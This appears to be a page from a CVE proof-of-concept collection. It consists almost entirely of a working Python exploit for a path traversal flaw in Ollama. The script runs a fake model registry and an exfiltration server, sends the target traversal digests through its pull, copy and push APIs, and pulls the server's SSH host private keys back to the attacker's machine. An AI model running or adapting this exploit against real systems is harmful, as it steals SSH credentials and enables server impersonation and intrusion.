5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / poc.py PY
#!/usr/bin/env python3
"""CVE-2026-7020 — Ollama tensor digest path traversal -> SSH key exfil

Usage: python3 poc.py <HOST:PORT>
Example: python3 poc.py 192.168.1.50:11434
"""
import hashlib, json, socket, sys, threading, time, urllib.request
from http.server import HTTPServer, BaseHTTPRequestHandler

if len(sys.argv) != 2:
    sys.exit(f"usage: {sys.argv[0]} HOST:PORT")

HOST  = sys.argv[1]
LPORT = 9999

KEYS = [
    ("/etc/ssh/ssh_host_ed25519_key", [399, 411, 419, 432]),
    ("/etc/ssh/ssh_host_rsa_key",     [2590, 2594, 2598, 2602, 2606, 2610, 2614, 2622, 2635]),
    ("/etc/ssh/ssh_host_ecdsa_key",   [492, 497, 501, 505, 509, 513, 517, 521, 525]),
]

CFG   = b'{"architecture":"amd64","os":"linux"}'
CFG_D = "sha256:" + hashlib.sha256(CFG).hexdigest()

def local_ip():
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try: s.connect(("8.8.8.8", 80)); return s.getsockname()[0]
    finally: s.close()

LIP = local_ip()
st  = {}
got = {}

class Reg(BaseHTTPRequestHandler):
    def do_GET(self):
        if "/manifests/" in self.path:
            m = json.dumps({"schemaVersion": 2,
                "mediaType": "application/vnd.docker.distribution.manifest.v2+json",
                "config": {"mediaType": "application/vnd.docker.container.image.v1+json",
                           "digest": CFG_D, "size": len(CFG)},
                "layers": [{"mediaType": "application/vnd.ollama.image.tensor",
                            "digest": st["trav"], "size": st["size"]}]}).encode()
            self.send_response(200)
            self.send_header("Content-Type", "application/vnd.docker.distribution.manifest.v2+json")
            self.send_header("Content-Length", str(len(m)))
            self.send_header("Docker-Content-Digest", "sha256:" + hashlib.sha256(m).hexdigest())
            self.end_headers(); self.wfile.write(m)
        elif "/blobs/" in self.path:
            self.send_response(200)
            self.send_header("Content-Length", str(len(CFG)))
            self.end_headers(); self.wfile.write(CFG)
        else:
            self.send_response(200)
            self.send_header("Docker-Distribution-API-Version", "registry/2.0")
            self.end_headers()
    def do_HEAD(self):
        code = 200 if "/blobs/" in self.path else 404
        self.send_response(code)
        if code == 200: self.send_header("Content-Length", str(len(CFG)))
        self.end_headers()
    def log_message(self, *a): pass

class Exf(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header("Docker-Distribution-API-Version", "registry/2.0")
        self.end_headers()
    def do_HEAD(self):
        self.send_response(404); self.end_headers()
    def do_POST(self):
        cl = int(self.headers.get("Content-Length", 0))
        if cl: self.rfile.read(cl)
        self.send_response(202)
        self.send_header("Location", f"http://{LIP}:{LPORT+1}{self.path.rstrip('/')}/u")
        self.send_header("Docker-Upload-UUID", "u"); self.end_headers()
    def do_PATCH(self):
        cl = int(self.headers.get("Content-Length", 0))
        data = self.rfile.read(cl) if cl else b""
        self._cap(data)
        self.send_response(202)
        self.send_header("Location", f"http://{LIP}:{LPORT+1}{self.path}")
        self.send_header("Range", f"0-{max(cl-1, 0)}")
        self.send_header("Docker-Upload-UUID", "u"); self.end_headers()
    def do_PUT(self):
        cl = int(self.headers.get("Content-Length", 0))
        data = self.rfile.read(cl) if cl else b""
        if "/manifests/" not in self.path: self._cap(data)
        self.send_response(201); self.end_headers()
    def _cap(self, data):
        clean = data.rstrip(b"\x00")
        if clean and (p := st.get("path")):
            if len(clean) > len(got.get(p, b"")): got[p] = clean
    def log_message(self, *a): pass

def api(ep, body, t=20):
    try:
        r = urllib.request.Request(f"http://{HOST}{ep}",
            data=json.dumps(body).encode(), headers={"Content-Type": "application/json"})
        return urllib.request.urlopen(r, timeout=t).read().decode()
    except Exception as e: return str(e)

for cls, port in [(Reg, LPORT), (Exf, LPORT+1)]:
    threading.Thread(target=HTTPServer(("0.0.0.0", port), cls).serve_forever, daemon=True).start()
time.sleep(0.3)

for i, (path, sizes) in enumerate(KEYS):
    for size in sizes:
        tag = f"x{i}s{size}"
        st.update({"trav": f"sha256:../../../../../../../../{path.lstrip('/')}", "size": size, "path": path})
        src = f"http://{LIP}:{LPORT}/l/{tag}:v"
        dst = f"http://{LIP}:{LPORT+1}/l/{tag}:v"
        if "success" in api("/api/pull", {"model": src, "insecure": True, "stream": False}).lower():
            api("/api/copy", {"source": src, "destination": dst})
            api("/api/push", {"model": dst, "insecure": True, "stream": False}, t=30)
        api("/api/delete", {"model": src})
        api("/api/delete", {"model": dst})
        if path in got: break

for path, data in got.items():
    print(f"=== {path} ===\n{data.decode(errors='replace')}")